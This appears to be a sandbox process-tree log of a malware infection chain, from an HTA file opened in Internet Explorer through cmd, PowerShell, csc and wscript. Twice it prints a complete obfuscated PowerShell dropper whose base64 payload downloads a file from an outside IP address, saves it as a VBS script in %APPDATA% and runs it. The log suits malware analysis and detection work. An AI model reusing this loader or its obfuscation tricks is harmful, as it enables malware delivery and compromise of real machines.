iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\ienetworkupdateshere.hta.html
204cmd.exe "C:\Windows\system32\cmd.exe" "/c POweRSHEll -EX bYpASs -Nop -w 1 -C DEvIcecRedEntiaLDEPLoYment.ExE ; IEx($(iex('[sysTEM.TExt.EncOdinG]'+[chAR]0x3A+[ChAR]0X3A+'UTF8.getStRiNG([syStEm.ConvErt]'+[chaR]0x3a+[CHaR]58+'fROMbASE64StRing('+[ChaR]34+'JGt1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpiTUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGxRQ1ptekksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmxJLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4QSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUWVBVZnBaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV1ciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1QSWltd2NwbENNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrdTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvMjAvbmV3cGljdHVyZXRvZ2V0dXBkYXRlbmV3dGhpbmdzLnRJRiIsIiRlTlY6QVBQREFUQVxuZXdwaWN0dXJldG9nZXR1cGRhdGVuZXd0aGluZy52QlMiLDAsMCk7c1RBUlQtc2xFRXAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5ld3BpY3R1cmV0b2dldHVwZGF0ZW5ld3RoaW5nLnZCUyI='+[cHAr]0x22+'))')))"
552powershell.exe POweRSHEll -EX bYpASs -Nop -w 1 -C DEvIcecRedEntiaLDEPLoYment.ExE ; IEx($(iex('[sysTEM.TExt.EncOdinG]'+[chAR]0x3A+[ChAR]0X3A+'UTF8.getStRiNG([syStEm.ConvErt]'+[chaR]0x3a+[CHaR]58+'fROMbASE64StRing('+[ChaR]34+'JGt1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpiTUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGxRQ1ptekksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmxJLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4QSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUWVBVZnBaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV1ciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1QSWltd2NwbENNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrdTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvMjAvbmV3cGljdHVyZXRvZ2V0dXBkYXRlbmV3dGhpbmdzLnRJRiIsIiRlTlY6QVBQREFUQVxuZXdwaWN0dXJldG9nZXR1cGRhdGVuZXd0aGluZy52QlMiLDAsMCk7c1RBUlQtc2xFRXAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5ld3BpY3R1cmV0b2dldHVwZGF0ZW5ld3RoaW5nLnZCUyI='+[cHAr]0x22+'))')))"
2120csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\yyt_sflz.cmdline"
2860cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES5CEC.tmp" "c:\Users\test22\AppData\Local\Temp\CSC5C7E.tmp"
1608wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\newpicturetogetupdatenewthing.vBS"
1560